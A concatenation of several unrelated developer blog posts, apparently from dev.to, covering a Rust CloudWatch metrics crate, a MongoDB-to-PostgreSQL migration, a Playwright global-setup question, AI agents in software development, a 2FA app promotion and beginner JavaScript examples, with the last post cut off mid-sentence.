assert_eq!(log.aws.cloud_watch_metrics[0].metrics[0].name, "test_metric_count"); assert_eq!(log.aws.cloud_watch_metrics[0].metrics[0].unit, MetricUnit::Count); assert_eq!( log.aws.cloud_watch_metrics[0].metrics[0].storage_resolution, 60 ); assert_eq!(log.metrics_values.0.get("test_metric_count"), Some(&1.0)); assert_eq!( log.aws.cloud_watch_metrics[0].metrics[1].name, "test_metric_seconds" ); assert_eq!(log.aws.cloud_watch_metrics[0].metrics[1].unit, MetricUnit::Seconds); assert_eq!( log.aws.cloud_watch_metrics[0].metrics[1].storage_resolution, 60 ); assert_eq!(log.dimensions.0.len(), 1); } #[test] fn should_handle_duplicated_metric() { let mut metrics = Metrics::new("test", "service", "dummy_service"); metrics.add_metric("test", MetricUnit::Count, 2.0); metrics.add_metric("test", MetricUnit::Count, 1.0); assert_eq!(metrics.metrics.len(), 1); } #[test] fn should_not_fail_over_100_metrics() { let mut metrics = Metrics::new("test", "service", "dummy_service"); for i in 0..100 { metrics.add_metric(&format!("metric{i}"), MetricUnit::Count, i as f64); } assert_eq!(metrics.metrics.len(), 100); metrics.add_metric("over_100", MetricUnit::Count, 11.0); assert_eq!(metrics.metrics.len(), 1); } #[test] fn should_fail_if_over_30_dimensions() { let mut metrics = Metrics::new("test", "service", "dummy_service"); for i in 0..29 { metrics .try_add_dimension(&format!("key{i}"), &format!("value{i}")) .unwrap(); } match metrics.try_add_dimension("key31", "value31") { Ok(_) => assert!(false, "expected error"), Err(_) => assert!(true), } } } ``` ## Example In the `examples` directory, I created the basic lambda function with AWS SAM. ```Rust // ... async fn function_handler(event: LambdaEvent<Request>) -> Result<Response, Error> { // Extract some useful info from the request let command = event.payload.command; let mut metrics = Metrics::new("custom_lambdas", "service", "dummy_service"); metrics.try_add_dimension("application", "customer_service"); metrics.add_metric("test_count", MetricUnit::Count, 10.4); metrics.add_metric("test_seconds", MetricUnit::Seconds, 15.0); metrics.add_metric("test_count", MetricUnit::Count, 10.6); // Prepare the response let resp = Response { req_id: event.context.request_id, msg: format!("Command {}.", command), }; // Return `Response` (it will be serialized to JSON automatically by the runtime) Ok(resp) } // ... ``` After `sam build && sam deploy` we can test the function from the console ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y9ek21rjb0j1fsp3a4er.png) As expected, there are two logs to the metrics. The first was emitted when we added the `test_count` metric for the second time, and the last one was emitted when the function finished. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dghm1ttam14arpafsav0.png) Finally, I can see metrics added to the `CloudWatch` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/038jkc18k6s57z1ejmbg.png) ## Cleaning up The library works, which is great, but there are probably things to improve. Let's run `clippy` - the great Rust linter. ```bash cargo clippy -- -D clippy::pedantic ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fvup64w8d3xu1mtccfar.png) The `pedantic` linter is pretty opinionated, but this is totally ok for me. All right, let's improve the code. ### Panics ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xq2c5mc30vc9wljdexod.png) The `new` function won't panic, since there are no dimensions added yet, so adding the first one is safe. This is a good place to use an `allow` statement to make it clear, that this behavior is intentionally handled this way. ```Rust impl Metrics { #[allow(clippy::missing_panics_doc)] pub fn new(namespace: &str, dimension_key: &str, dimension_value: &str) -> Self { let mut metrics = Self { dimensions: Dimensions(HashMap::new()), namespace: Namespace(namespace.to_string()), metrics: Vec::new(), }; // UNWRAP: for new metrics there is no risk of reaching max number of dimensions metrics .try_add_dimension(dimension_key, dimension_value) .unwrap(); metrics } ``` The second `panic` is more interesting. The `into` function for `CloudWatchMetricsLog` might fail if `Serialize` decides to panic, or there are `HashMaps` with non-string keys. Instead of `Into` I need to implement `TryInto`. Not to say that I shouldn't create a bare `into` function, but implement `TryInto` trait. ```Rust impl TryInto<String> for CloudWatchMetricsLog { type Error = String; fn try_into(self) -> Result<String, Self::Error> { serde_json::to_string(&self).map_err(|err| err.to_string()) } } ``` For now, I leave `Error` as a `String`, because I am not going to return it to the caller. Instead, I will only print an error ```Rust /// Flushes the metrics to stdout in a single payload /// If an error occurs during serialization, it will be printed to stderr pub fn flush_metrics(&mut self) { let serialized_metrics: Result<String, _> = self.format_metrics().try_into(); match serialized_metrics { Ok(payload) => println!("{payload}"), Err(err) => eprintln!("Error when serializing metrics: {err}"), } self.metrics = Vec::new(); } ``` ### must_use and other Clippy (pedantic) checks public functions as candidates for `#[must_use]` attribute. The `new` function for `Metrics` feels like good match. ```Rust impl Metrics { #[allow(clippy::missing_panics_doc)] #[must_use] pub fn new(namespace: &str, dimension_key: &str, dimension_value: &str) -> Self { // ... ``` I have also followed other `clippy` suggestions, including docs formatting. Speaking of what .... ## Documentation Rust has a great story for creating documentation. Doc comments let use markdown, and eventually, are transformed into the web page. After adding comments to the crate in general, and to the public structs and functions we have pretty nice docs out-of-the-box. I run ```bash cargo doc --open --lib ``` The browser automatically opens a page with my docs: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kaieu8vw7rl8u2lqvoar.png) ## Publish crate Ok, now I am ready to publish the first version of the created lib. It is exciting! I change the name of the lig to `lambda-helpers-metrics`, and set the version to the `0.1.0-alpha`. After creating an account on `crates.io` and email verification I am set up to publish crates. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ee0k5q0lmk9lzz23r9sk.png) :tada: :tada: :tada: Now I can run `cargo add lambda_helpers_metrics` in any lambda function project and add some metrics. It feels nice :) # Summary I built a simple library for creating metrics using AWS EMF spec. Thanks to that we can avoid expensive calls with `putMetrics` and simply log data in the specific shape to the console. `Clippy` helped me to catch a bunch of possible mistakes. Finally, I published the crate to the `crates.io` so it can be added to the project with `cargo add` # Next steps There are some things I would like to work on next - defining `Errors` with the proper types - tracking cold starts - add CI/CD Please add a comment if you see more useful features to be added. Thanks!
szymonszym
1,909,136
Migration from NoSql to Sql , MongoDB to PostgreSql with PRISMA.
In my career as a backend developer, I've recently come across a big challenge, that of moving from a...
0
2024-07-02T16:43:46
https://dev.to/christian_birego_e9b83eaa/migration-from-nosql-to-sql-mongodb-to-postgresql-with-prisma-dem
javascript, prisma, mongodb, postgres
In my career as a backend developer, I've recently come across a big challenge, that of moving from a Nosql database to an sql database. This task turned out to be complicated, but it gave me the ability to learn more. Today I'm going to share my experience with you! an application using mongodb to store data, but for technical and maintenance reasons we decided to switch to postgress to benefit from more complex functionalities and queries. and this in a migration without disrupting the user experience. which was a great challenge. the first step was to plan the migration, so I started by doing a study of the data structure in mongodb to arrange and structure it well for the migration. then I made a relationship diagram adapted to postgresql. planning was the most crucial step because at the slightest error I could lose everything or misconnect the data. Prisma became my earliest and most valuable ally in this process. Configuring prisma with postgress seemed easier than doing it with PGSL. prisma made DB management easier by providing me with tools to help me create and manipulate my data in an intuitive and visible way in a graphical interface in the browser on prisma studio. after defending the schema and configuration in prisma, the migration was easier but more delicate. I had to export the data from my nosQL DB and import it into the sql DB. with a little patience and delicacy, I transferred all the data. once the migration was complete, we ran a series of tests to verify the presence of all the data, while optimizing the performance of the database, which was satisfactory. this migration has become for me the greatest technical experience I've had in my career as a backend developer. thanks to [hng](https://hng.tech/internship) for allowing me to express my knowledge and find out more about [hng](https://hng.tech/premium). thank you for reading all the way to the end. [christian birego ](https://coinkivu.com/profile/christian-birego)
christian_birego_e9b83eaa
1,909,135
openai/whisper-large-v3-torrent
https://aitorrent.zerroug.de/openai-whisper-large-v3/
0
2024-07-02T16:43:01
https://dev.to/octobreak/openaiwhisper-large-v3-torrent-28id
ai, machinelearning, openai, beginners
https://aitorrent.zerroug.de/openai-whisper-large-v3/
octobreak
1,909,134
Advances in Deep Learning for Time Series Forecasting 2024
https://medium.com/deep-data-science/advances-in-deep-learning-for-time-series-forecasting-classifica...
0
2024-07-02T16:40:51
https://dev.to/isaacmg/advances-in-deep-learning-for-time-series-forecasting-2024-876
deeplearning, pytorch, timeseriesforecasting, opensource
https://medium.com/deep-data-science/advances-in-deep-learning-for-time-series-forecasting-classification-winter-2024-a3fd31b875b0
isaacmg
1,909,133
Issue facing with Global Setup
I am facing one issue related to global setup and teardown approach : --&gt; i have to run mutliple...
0
2024-07-02T16:40:51
https://dev.to/chandansh27/issue-facing-with-global-setup-4pnk
I am facing one issue related to global setup and teardown approach : --> i have to run mutliple spec files , which are in different folders under test and wanted to login once and logout once all the spec files are executed. -> So i have created global-setup.ts file and global-teardown.ts file for storing the state and once everything is done, teardown will logout. --> i have given tags in the specific tests and created a config file where i have used it and created one test-runner file where these test cases will run --> Also setup is done in playwright.config file ==> Now the problem statement is : when i am running the command , login is done and state is stored by global-setup and first test cases gets executed , but for the 2nd testcase login is happening again , if i comment the global-setup and global-teardown in playwright config , all the testcases are running as expected, because storage state is maintained , but this is not the ideal scenario, because when we run it in CI/CD problem will arise again , i am sharing code of all the files, please shared to expert advice (cant share the code on git , because this is office project) [will also share the project structure ] global-setup.ts file :import { Browser, chromium, FullConfig } from '@playwright/test'; import { LoginPage } from '../../app/pages/login.page'; import * as fs from 'fs'; import { saveStorageState } from '../../../utils/utils'; export let browserConnection: Browser; export let wsEndPoint: string; async function globalSetup(config: FullConfig) { const server = await chromium.launchServer({ headless: false }); wsEndPoint = server.wsEndpoint(); const browser = await chromium.connect(wsEndPoint); browserConnection = browser; const context = await browser.newContext(); const page = await context.newPage(); const loginPage = new LoginPage(page, context); await loginPage.login(); //global.__LOGIN_PAGE__ = loginPage; //await new Promise((resolve) => setTimeout(resolve, 3000)); await saveStorageState(context, page); await context.close(); //await browser.close(); } --------------- export default globalSetup; global-terdown.ts : import { FullConfig } from '@playwright/test'; import { chromium } from '@playwright/test'; import { LoginPage } from '../../app/pages/login.page'; import { loadStorageState } from '../../../utils/utils'; import { wsEndPoint } from './global-setup'; async function globalTeardown(config: FullConfig) { const browser = await chromium.connect(wsEndPoint); const context = await browser.newContext({ storageState: 'localStorageState.json' }); //const openPages = context.pages(); // console.log(`Number of open tabs: ${openPages.length}`); // Close all open pages in the context // for (const page of openPages) { // await page.close(); // } const origin = await loadStorageState(context); const page = await context.newPage(); await page.goto(origin); const loginPage = new LoginPage(page, context); await loginPage.logout(); //await new Promise((resolve) => setTimeout(resolve, 3000)); await page.close(); await context.close(); await browser.close(); } export default globalTeardown; --------------- --------------------------------------- test-cases.config.ts : { "testCases": [ { "file": "./src/app/tests/designers/module-designer/create-module.spec.ts", "tags": ["create-new-project"] }, { "file": "./src/app/tests/designers/entity-designer/create-entity.spec.ts", "tags": ["test-case-1"] } ] } ----------------- test-runner.ts : import { exec } from 'child_process'; import { promisify } from 'util'; import * as fs from 'fs'; const execAsync = promisify(exec); async function runTests() { const config = JSON.parse(fs.readFileSync('./test-cases.config.json', 'utf-8')); const testCases = config.testCases; for (const { file, tags } of testCases) { for (const tag of tags) { try { console.log(`Running tests in ${file} with tag @${tag}`); await execAsync(`npx playwright test ${file} --grep "@${tag}"`); } catch (error) { console.error(`Error running tests in ${file} with tag @${tag}:`, error); process.exit(1); // Exit on failure } } } console.log('All tests passed'); } runTests().catch(err => { console.error(err); process.exit(1); }); ------------------ --------------- playwright.config.ts : import { defineConfig, devices } from '@playwright/test'; export default defineConfig({ globalSetup: require.resolve('./src/app/global/global-setup'), globalTeardown: require.resolve('./src/app/global/global-teardown'), use: { headless: false, channel: 'chrome', screenshot: 'on', video: 'on', viewport: { width: 1920, height: 970 }, launchOptions: { slowMo: 3500, args: ['--window-position=-5,-5'], }, trace: 'on', }, timeout: 1200000, testDir: 'src/app/tests', fullyParallel: false, forbidOnly: !!process.env.CI, retries: process.env.CI ? 2 : 0, workers: process.env.CI ? 1 : 1, reporter: 'html', projects: [ { name: 'chromium', use: { ...devices['Desktop Chrome'], storageState: './localStorageState.json' }, }, // Define other projects as needed... ], }); ---- 1st spec file : import { test, expect, Page } from '@playwright/test'; import moduleDesignerTestConfig from "../../../../app/data/module-designer-test.config.json"; import { MenuNavigatorPage } from '../../../pages/menu-navigator.page'; import { ModuleDesignerPage } from '../../../pages/designers/module-designer/module-designer.page'; import * as fs from 'fs'; import { loadStorageState } from '../../../../../utils/utils'; import { LoginPage } from '../../../pages/login.page'; test.describe.configure({ mode: 'serial' }); let menuNavigatorPage: MenuNavigatorPage; let moduleDesignerPage: ModuleDesignerPage; test.beforeAll(async ({ browser }) => { const context = await browser.newContext({ storageState: 'localStorageState.json' }); const page = await context.newPage(); const origin = await loadStorageState(context); await page.goto(origin); menuNavigatorPage = new MenuNavigatorPage(page, context); moduleDesignerPage = new ModuleDesignerPage(page, context); }); test('Create New Module by creating new project @create-new-project', async () => { const projectName = await moduleDesignerPage.projectDesignerPage.createProject(); if (projectName) { const moduleName = await moduleDesignerPage.createNewModule(projectName); expect(moduleName).toContain(moduleDesignerTestConfig.module.moduleName); } else { throw new Error('Failed to create project'); } }); test('Create New Module in existing project', async () => { const projectName = moduleDesignerTestConfig.module.projectNameForModule; if (projectName) { const moduleName = await moduleDesignerPage.createNewModule(projectName); expect(moduleName).not.toBeNull(); } else { throw new Error('Project name for module is not defined in the config'); } }); ----- ----- 2nd spec file import { test, expect, BrowserContext, Page } from '@playwright/test'; import { LoginPage } from '../../../pages/login.page'; import testConfig from "../../../../../test.config.json"; import { MenuNavigatorPage } from '../../../pages/menu-navigator.page'; import { getRandomNumber, loadStorageState } from '../../../../../utils/utils'; import { EntityDesignerPage } from '../../../pages/designers/entity-designer/entity-designer.page'; import { TestSuite } from '../../../common/test-suite.enum'; import entityDesignerTestConfig from "../../../data/entity-designer-test.config.json"; import { IEntity } from '../../../pages/designers/entity-designer/entity-designer.model'; import * as fs from 'fs'; test.describe(TestSuite.entityDesigner, () => { test.describe.configure({ mode: 'serial' }); let menuNavigatorPage: MenuNavigatorPage; let entityDesignerPage: EntityDesignerPage; let context: BrowserContext; let page: Page; test.beforeAll(async ({ browser }) => { const context = await browser.newContext({ storageState: 'localStorageState.json' }); const page = await context.newPage(); const origin = await loadStorageState(context); await page.goto(origin); menuNavigatorPage = new MenuNavigatorPage(page, context); entityDesignerPage = new EntityDesignerPage(page, context) }); // test.afterEach(async ({ page, context }) => { // await loginPage.logout(); // }); test('Create New Entity with main table by creating new project @test-case-1', async () => { let projectName = await entityDesignerPage.projectDesignerPage?.createProject(); let entityName = await entityDesignerPage.createNewEntity(projectName as string , testConfig.entityTest.entityName + getRandomNumber()); expect(entityName).toContain(testConfig.entityTest.entityName); }); test('Create New Entity with main table using existing project', async () => { let entityName = await entityDesignerPage.createNewEntity(testConfig.entityTest.projectNameForEntity, testConfig.entityTest.entityName + getRandomNumber()); expect(entityName).toContain(testConfig.entityTest.entityName); }); test('Create Standard Entity In Standard Automation Project', async () => { let entityName = await entityDesignerPage.createNewEntity(testConfig.standard.projectName, testConfig.standard.entity.entityName); expect(entityName).toBe(testConfig.standard.entity.entityName); }); test('Create New Entity with main table for Standard project', async () => { const entity: IEntity = entityDesignerTestConfig.entity; let entityName = await entityDesignerPage.createNewEntityForStandardProject(testConfig.standard.projectName, entity); expect(entityName).toContain(testConfig.standard.entity.entityName); }); }); ---- this is common file for function: import { ControlEvent, HttpVerb } from "../src/app/common/common.model"; import { Response } from "playwright-core"; import { BrowserContext, Page } from '@playwright/test'; import * as fs from 'fs'; export async function saveStorageState(context: BrowserContext, page: Page) { // Save localStorage state await context.storageState({ path: 'localStorageState.json' }); // Get session storage and store as a file const sessionStorage: any = await page.evaluate(() => JSON.stringify(sessionStorage)); fs.writeFileSync('sessionStorage.json', sessionStorage, 'utf-8'); } export async function loadStorageState(context: BrowserContext) { // Load the saved storage state const savedStorageStateStr = fs.readFileSync('localStorageState.json', 'utf8'); const savedStorageState = JSON.parse(savedStorageStateStr); // Manually set cookies await context.addCookies(savedStorageState.cookies); const origin = savedStorageState.origins[0].origin; // Manually set local storage const sessionStorage = JSON.parse(fs.readFileSync('sessionStorage.json', 'utf-8')); await context.addInitScript(storage => { for (const [key, value] of Object.entries(storage)) { window.sessionStorage.setItem(key, value as string); } }, sessionStorage); ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lkjcwd1vhsjevcw47k9t.JPG) return origin; }
chandansh27
1,909,132
Evolving Landscape Of Software Development With AI Agents
The world of software development is undergoing a revolution driven by Artificial Intelligence (AI)...
0
2024-07-02T16:40:17
https://www.techdogs.com/td-articles/trending-stories/evolving-landscape-of-software-development-with-ai-agents
softwaredevelopment, ai, technology, programming
The world of software development is undergoing a revolution driven by [Artificial Intelligence (AI)](https://www.techdogs.com/category/ai) agents. These intelligent assistants are transforming how we create software, automating tasks, improving efficiency, and opening doors to exciting new possibilities. AI agents go beyond simply writing code. They can analyze existing codebases to identify patterns and generate new code, review code for errors and suggest improvements, and even track and fix bugs automatically. This frees up developers to focus on more complex tasks and strategic thinking. Let's delve deeper into how AI agents are changing the game in software development, exploring areas like natural language interfaces, code audits, and automatic error tracking... **How Artificial Intelligence Started** While “Tenet” did express a grand heist all through time, AI tools did not suddenly dominate [software development](https://www.techdogs.com/td-articles/curtain-raisers/introduction-to-software-development). They went backward and forward saving us from legacy systems as they morphed them. There has been a complete change of how software is written, debugged, and managed. Diving into the fascinating advances of AI agents we must first trace the roots of this revolution which is being powered by AI. Though there had been theories surrounding its existence in other periods, it was not until recently that AI started making considerable impact on software development. Through Machine Learning advancements, as well as [Natural Language Processing (NLP)](https://www.techdogs.com/td-articles/curtain-raisers/natural-language-processing-nlp-software-101) with deep learning among them; mankind has been able to come up with intelligent AI programs; which have taken over jobs which only belonged to man such as programming. **How Do AI Agents Enable Better Software Development?** ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ugb333h8ij26ha0d08mm.gif) [Source](https://tenor.com/view/that-part-is-a-little-dramatic-dramatic-overreacting-overreached-a-little-much-gif-17341248) - **Automated Code Generation** - The tables have turned on automation in the same way time is reversed in "Tenets". By studying existing codebases AI agents may engineer the past and create new one basing on historical patterns. Faster development is achieved through “learning from existing code” that also leads to generating better codebases. It is worth noting how tools such as GPT-3 have managed to write pieces of software from plain English instructions that describe what someone wants their program to do. - **Code Review and Quality Assurance** - ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1a85v2ya88yfin2zq6e5.jpg) [Source](https://upload.wikimedia.org/wikipedia/commons/7/71/Sator_Square_at_Opp%C3%A8de.jpg) Code review process has been made symmetrical by artificially intelligent agents! They are capable of identifying errors, detecting vulnerabilities and verifying that one has strictly followed coding regulations always. This makes the code review loop appear as a palindrome, thus ensuring thorough scrutiny on every sentence written on the computer screen. These agents do not just write programs; they also correct any faults found such as bugs in code generation algorithms or possible security lapses which may pave way for attacks against users’ sensitive information if left unchecked in time. At the same time they give suggestions on how best one can optimize their existing codes, thus making it easier for developers during this exercise while reducing chances of errors. - **Predictive Analytics** – Software development projects frequently face the challenge of uncertainty. AI agents simplify the process of forecasting project metrics; in particular the time for development, how resources are to be shared out as well as possible bottle necks. Through the use of preceding information and the current state of the project, they help managers and programmers improve their judgment. Predictive analytics also has the capacity to foresee upcoming characteristics that users may request or locate segments of improvement according to user behaviour or preference. - **Natural Language Interfaces** – AI is fascinating in programming when used in Natural Language Interfaces. Developers in this case would not have to remember complicated syntaxes because they can simply give instructions to the AI using their everyday languages. In this case developers tell what they want the AI agent to do, and it finds code it needs for this task in different repositories as far as deployment pipeline is concerned. - **Bug Detection and Resolution** – Every software project requires that issues be found and fixed. It is also necessary to note that AI agents watch over different development stages of software, identify problems, propose ways of solving those problems. Their ability to correct simple defects on their own some of the time is key because it makes work easier for both developers and engineers as well as ensuring that they can use their time on other things instead of just fixing bugs every day which makes it a long process if one is to do it manually because this will require someone doing it manually for many years if any major application these days due to its level of complexity. **The Future of AI in Software Development** ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/72vri5c03hr0frx53swf.gif) [Source](https://tenor.com/view/it-hasnt-happened-yet-not-yet-woah-shocked-john-david-washington-gif-15852379) mentally taking a look at the changing background of programming modeled by AI based software agents can be likened to learning from existing code puzzles like those found in "Tenet”. This allows us to peer at tomorrow. Artificial intelligence calculator development occurring at the same time as the increased creativity of artificial intelligent (AI) will give us original computer programs among other creations. Together with knowledge sharing, AI methods will fasten collaboration. AI will also identify individuals with particular skills thereby promoting knowledge transfer as well as collaboration among different developers. **Conclusion** – Shift towards AI-guided software development clearly depicts how revolutionary AI can be in the software development industry. AI assistants are considered to be time –saving, collaboration-enhancing agents that also make code better. It is essential that ethics drive their utilization so as to strike a balance between automation and human creativity among others things. However, let us just embrace them and we will be ready for the future software development world that is powered by AI. The temporal dynamics of "Tenet" may be science fiction, but the future of software development with AI agents is an exhilarating reality! For further details, please read the full article [[here](https://www.techdogs.com/td-articles/trending-stories/evolving-landscape-of-software-development-with-ai-agents)]. Dive into our content repository of the latest [tech news](https://www.techdogs.com/resource/tech-news), a diverse range of articles spanning [introductory guides](https://www.techdogs.com/resource/td-articles/curtain-raisers), product reviews, trends and more, along with engaging interviews, up-to-date [AI blogs](https://www.techdogs.com/category/ai) and hilarious [tech memes](https://www.techdogs.com/resource/td-articles/tech-memes)! Also explore our collection of [branded insights](https://www.techdogs.com/resource/branded-insights) via informative [white papers](https://www.techdogs.com/resource/white-papers), enlightening case studies, in-depth [reports](https://www.techdogs.com/resource/reports), educational [videos ](https://www.techdogs.com/resource/videos)and exciting [events and webinars](https://www.techdogs.com/resource/events) from leading global brands. Head to the **[TechDogs](https://www.techdogs.com/) homepage** to Know Your World of technology today!
td_inc
1,908,821
Unveiling the Truth: Debunking Myths and Misconceptions about 2FA
In the ever-evolving landscape of cybersecurity, two-factor authentication (2FA) stands as a beacon...
0
2024-07-02T16:38:42
https://dev.to/verifyvault/unveiling-the-truth-debunking-myths-and-misconceptions-about-2fa-2a1f
opensource, security, cybersecurity, github
In the ever-evolving landscape of cybersecurity, two-factor authentication (2FA) stands as a beacon of hope against data breaches and identity theft. Yet, despite its crucial role in safeguarding our online accounts, there are numerous myths and misconceptions that surround this powerful security measure. Let's dive into the facts and dispel the myths to ensure you understand the true value of 2FA. #### **<u>Myth #1: 2FA is Only for Tech-Savvy Users</u>** One of the most common misconceptions about 2FA is that it's complicated and only suitable for tech enthusiasts. In reality, 2FA has become incredibly user-friendly over the years. Many platforms offer simple options like SMS codes or push notifications that require just a tap on your smartphone. It adds an extra layer of security without adding complexity. #### **<u>Myth #2: 2FA is Vulnerable to Hacks</u>** Some believe that 2FA methods, particularly SMS codes, are susceptible to interception or SIM swapping attacks. While these risks exist, modern 2FA solutions, such as authenticator apps like VerifyVault, use time-based one-time passwords (TOTP) that are not transmitted over the internet. This makes them significantly more secure than SMS-based methods. #### **<u>Myth #3: 2FA is Annoying and Time-Consuming</u>** Another myth is that 2FA is a hassle that slows down access to your accounts. While it does add an extra step, the added security far outweighs the minimal inconvenience. Most authentication prompts are quick and seamless, especially with authenticator apps that generate codes instantly. #### **<u>Myth #4: 2FA Provides Bulletproof Security</u>** While 2FA drastically enhances your account's security, it's not invulnerable. Phishing attacks, where malicious actors trick users into revealing their credentials, can bypass 2FA. Therefore, it's crucial to remain vigilant and verify the authenticity of requests even when using 2FA. ### **<u>Introducing VerifyVault: Your Reliable 2FA Companion</u>** If you're ready to step up your online security game, consider using VerifyVault—a free and open-source 2FA application designed for Windows and soon Linux users. Unlike many commercial solutions, VerifyVault prioritizes privacy and transparency. Here’s why you should give it a try: - **Free and Open Source:** No cost and complete transparency in its codebase. - **Offline and Encrypted:** Works offline for enhanced security, and all data is encrypted to protect your accounts. - **Password Lock and Automatic Backups:** Adds an extra layer of security with a password lock feature and ensures your accounts are always backed up. - **Easy Account Management:** Import and export your accounts seamlessly via QR codes or files. Don't let myths deter you from adopting this essential security measure. Start using VerifyVault today and fortify your online presence with robust two-factor authentication. Your accounts deserve the best protection, and VerifyVault delivers exactly that. Download [VerifyVault](https://github.com/VerifyVault) now and take control of your online security. [VerifyVault Beta v0.2.2 Direct Download](https://github.com/VerifyVault/VerifyVault/releases/tag/Beta-v0.2.2 ) _Stay informed. Stay secure. Embrace 2FA with VerifyVault. Your accounts will thank you._
verifyvault
1,909,091
10 Fun JavaScript Ideas to Try Today
JavaScript is a powerful programming language that allows developers to build dynamic and interactive...
0
2024-07-02T16:37:48
https://dev.to/mukeshb/10-fun-javascript-ideas-to-try-today-1gha
javascript, webdev, html, bitcoin
JavaScript is a powerful programming language that allows developers to build dynamic and interactive web applications. Whether you're just starting out or have years of experience, working on real projects is a great way to improve your JavaScript skills. This guide presents a collection of practical JavaScript examples that cover a wide range of common tasks and features for web applications. Each example includes code snippets along with explanations of how they work. By exploring these, you'll gain hands-on experience with key JavaScript concepts and learn how to create more interactive and user-friendly web pages. **Examples** **Finding Operating System Details** ```js const os = navigator.platform; alert("Your Operating System: " + os); ``` - `navigator.platform`: This property returns a string representing the platform (operating system) of the browser. - The alert function is used to display a pop-up box that shows the detected operating system. This is useful for understanding the environment in which your web application is running. **Detecting User's Browser** ```js const browser = navigator.userAgent; alert("Your Browser: " + browser); ``` - `navigator.userAgent`: This property returns the user-agent string of the browser. It contains information about the browser version, operating system, and other details. - This information can be used for browser-specific functionality or for analytics purposes to understand what browsers your users are using. **Creating a Digital Clock** ```html <div id="clock"></div> <script> setInterval(() => { const now = new Date(); document.getElementById('clock').innerText = now.toLocaleTimeString(); }, 1000); </script> ``` - `<div id="clock"></div>`: This is an HTML element where the current time will be displayed. - `setInterval(callback, 1000)`: This JavaScript function repeatedly calls the callback function every 1000 milliseconds (1 second). - `new Date()`: Creates a new Date object representing the current date and time. - `now.toLocaleTimeString()`: Formats the current time as a human-readable string. - `document.getElementById('clock').innerText = now.toLocaleTimeString()`: Updates the content of the div with the current time. **Form Validation** ```html <html> <head> <title>Form Validation</title> </head> <body> <form id="myForm"> <input type="text" id="name" placeholder="Enter your name"> <button type="submit">Submit</button> </form> <script> document.getElementById('myForm').addEventListener('submit', function(event) { const name = document.getElementById('name').value; if (!name) { alert("Name is required"); event.preventDefault(); } }); </script> </body> </html> ``` - `<form id="myForm">`: A form element where users can input their name. - `document.getElementById('myForm').addEventListener('submit', function(event) { ... })`: Adds an event listener to the form's submit event. - `document.getElementById('name').value`: Gets the value entered in the input field. - `if (!name) { ... }`: Checks if the input field is empty. - `alert("Name is required")`: Displays an alert if the input field is empty. - `event.preventDefault()`: Prevents the form from submitting if the validation fails, ensuring the user corrects their input before proceeding. **Displaying Mouse Coordinates** ```html <div id="coords">Move your mouse over this area.</div> <script> document.addEventListener('mousemove', function(event) { const coords = `X: ${event.clientX}, Y: ${event.clientY}`; document.getElementById('coords').innerText = coords; }); </script> ``` - `<div id="coords">Move your mouse over this area.</div>`: A div element to display the mouse coordinates. - `document.addEventListener('mousemove', function(event) { ... })`: Adds an event listener to the document's mousemove event. - `const coords = \X: ${event.clientX}, Y: ${event.clientY}`: Gets the mouse coordinates relative to the viewport. - `document.getElementById('coords').innerText = coords`: Updates the div with the current mouse coordinates. **Generating Random Numbers** ```html <button id="generate">Generate Random Number</button> <p id="randomNumber"></p> <script> document.getElementById('generate').addEventListener('click', function() { const randomNumber = Math.floor(Math.random() * 100) + 1; document.getElementById('randomNumber').innerText = "Random Number: " + randomNumber; }); </script> ``` - `<button id="generate">Generate Random Number</button>`: A button to generate a random number. - `<p id="randomNumber"></p>`: A paragraph to display the generated random number. - `document.getElementById('generate').addEventListener('click', function() { ... })`: Adds a click event listener to the button. - `const randomNumber = Math.floor(Math.random() * 100) + 1;`: Generates a random number between 1 and 100. - `document.getElementById('randomNumber').innerText = "Random Number: " + randomNumber;`: Displays the generated random number in the paragraph. **Changing Background Color Randomly** ```html <button id="randomColor">Change Background Color</button> <script> document.getElementById('randomColor').addEventListener('click', function() { const colors = ['red', 'green', 'blue', 'yellow', 'purple']; const randomColor = colors[Math.floor(Math.random() * colors.length)]; document.body.style.backgroundColor = randomColor; }); </script> ``` - `<button id="randomColor">Change Background Color</button>`: A button to change the background color. - `document.getElementById('randomColor').addEventListener('click', function() { ... })`: Adds a click event listener to the button. - `const colors = ['red', 'green', 'blue', 'yellow', 'purple'];`: An array of color options. - `const randomColor = colors[Math.floor(Math.random() * colors.length)];`: Selects a random color from the array. - `document.body.style.backgroundColor = randomColor;`: Sets the body's background color to the randomly selected color. **Building a To-Do List** ```html <input type="text" id="taskInput" placeholder="Enter a task"> <button id="addButton">Add Task</button> <ul id="taskList"></ul> <script> document.getElementById('addButton').addEventListener('click', function() { const task = document.getElementById('taskInput').value; const li = document.createElement('li'); li.innerText = task; document.getElementById('taskList').appendChild(li); }); </script> ``` - `<input type="text" id="taskInput" placeholder="Enter a task">`: An input field for entering tasks. - `<button id="addButton">Add Task</button>`: A button to add the task to the list. - `<ul id="taskList"></ul>`: An unordered list to display the tasks. - `document.getElementById('addButton').addEventListener('click', function() { ... })`: Adds an event listener to the button's click event. - `document.getElementById('taskInput').value`: Gets the value entered in the input field. - `const li = document.createElement('li')`: Creates a new list item element. - `li.innerText = task`: Sets the text of the list item to the entered task. - `document.getElementById('taskList').appendChild(li)`: Adds the new list item to the task list. **Creating a Dropdown Menu** ```html <select id="dropdown"> <option value="Option 1">Option 1</option> <option value="Option 2">Option 2</option> <option value="Option 3">Option 3</option> </select> <button id="showSelection">Show Selected Option</button> <script> document.getElementById('showSelection').addEventListener('click', function() { const selectedOption = document.getElementById('dropdown').value; alert("Selected Option: " + selectedOption); }); </script> ``` - `<select id="dropdown">`: A dropdown menu with three options. - `<button id="showSelection">Show Selected Option</button>`: A button to show the selected option from the dropdown menu. - `document.getElementById('showSelection').addEventListener('click', function() { ... })`: Adds a click event listener to the button. - `const selectedOption = document.getElementById('dropdown').value;`: Gets the value of the selected option. - `alert("Selected Option: " + selectedOption);`: Displays an alert with the selected option. **Toggling Visibility of 